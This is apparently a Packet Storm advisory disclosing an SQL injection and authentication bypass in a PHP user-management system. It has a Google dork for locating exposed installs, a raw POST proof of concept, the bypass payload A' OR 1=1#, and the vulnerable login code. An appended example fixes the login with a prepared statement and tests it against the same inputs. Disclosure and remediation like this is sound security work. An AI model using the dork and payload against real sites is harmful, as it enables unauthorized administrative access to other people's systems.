packetstorm | bRpsd | PACKETSTORM:179147
History: Jun 19, 2024 - 12:00 a.m.

User Registration And Management System 3.2 SQL Injection

2024-06-19 00:00:00
bRpsd
packetstormsecurity.com

AI Score: 7.4 High (Confidence: Low)

`@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
.:. Exploit Title > User Registration & Management System - SQLi  
.:. Google Dorks .:.  
inurl:loginsystem/index.php  
.:. Date: June 18, 2024  
.:. Exploit Author: bRpsd  
.:. Contact: cy[at]live.no  
.:. Vendor -> https://phpgurukul.com/  
.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003  
.:. Product Version -> Version 3.2  
.:. DBMS -> MySQL  
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
#############  
|DESCRIPTION|  
#############  
"User Management System is a web based technology which manages user database and provides rights to update their details. In this web application, user must be registered. This web application provides a way to effectively control, record & track the user details who himself/herself registered with us."  
===========================================================================================  
Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass  
Types: error-based  
File: localhost/admin/index.php  
Vul Parameter: USERNAME [POST]  
POST PoC #1: http://tom:8080/loginsystem/admin/index.php  
Host: tom  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 38  
Origin: http://tom  
Connection: keep-alive  
Referer: http://tom/loginsystem/admin/index.php  
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a  
Upgrade-Insecure-Requests: 1  
username='&password=test&login=  
Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9  
===========================================================================================  
Test #2 => Payload to skip authentication  
http://localhost:9000/loginsystem/admin/index.php  
username=A' OR 1=1#&password=1&login=  
Response:  
302 redirect to dashboard.php  
===========================================================================================  
Vuln File: /loginsystem/admin/index.php  
Vul Code:  
<?php session_start();  
include_once('../includes/config.php');  
// Code for login  
if(isset($_POST['login']))  
{  
$adminusername=$_POST['username'];  
$pass=md5($_POST['password']);  
$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");  
$num=mysqli_fetch_array($ret);  
if($num>0)  
`
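
A hardened form of the login check quoted above, as an added example that is not part of the original advisory or the vendor's code: the username is bound through a prepared statement, so both username values from the PoC are handled as data and rejected. The function name `admin_login`, the in-memory SQLite fixture standing in for the MySQL `admin` table, and the sample credentials are assumptions.

```php
<?php
declare(strict_types=1);

// Hardened admin lookup (hypothetical helper name). The username is bound as
// a parameter, never concatenated into the SQL text, so quotes or '#' inside
// it cannot change the structure of the query.
function admin_login(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT password FROM admin WHERE username = ?');
    $stmt->execute([$username]);
    $stored = $stmt->fetchColumn();
    if ($stored === false) {
        return false; // no row for this username
    }
    // Constant-time comparison against the md5 format the vulnerable code uses.
    // md5 is kept only to match the existing table layout; password_hash() and
    // password_verify() are the proper replacement for stored passwords.
    return hash_equals((string) $stored, md5($password));
}

// Constructed fixture: in-memory SQLite stands in for the MySQL `admin` table
// (assumption, so the example runs without a database server).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin (username TEXT PRIMARY KEY, password TEXT)');
$db->prepare('INSERT INTO admin VALUES (?, ?)')
   ->execute(['admin', md5('S3cret!')]); // constructed credentials

// The two username values from the advisory, plus constructed control cases.
$cases = [
    ["'",          'test',    false],
    ["A' OR 1=1#", '1',       false],
    ['admin',      'S3cret!', true],
    ['admin',      'wrong',   false],
];

foreach ($cases as [$user, $pass, $expected]) {
    $ok = admin_login($db, $user, $pass);
    if ($ok !== $expected) {
        throw new RuntimeException('unexpected result for ' . var_export($user, true));
    }
    printf("%-16s => %s\n", var_export($user, true), $ok ? 'accepted' : 'rejected');
}
```

With the application's own mysqli connection the same binding is done with `mysqli_prepare()`, `mysqli_stmt_bind_param()` and `mysqli_stmt_execute()`.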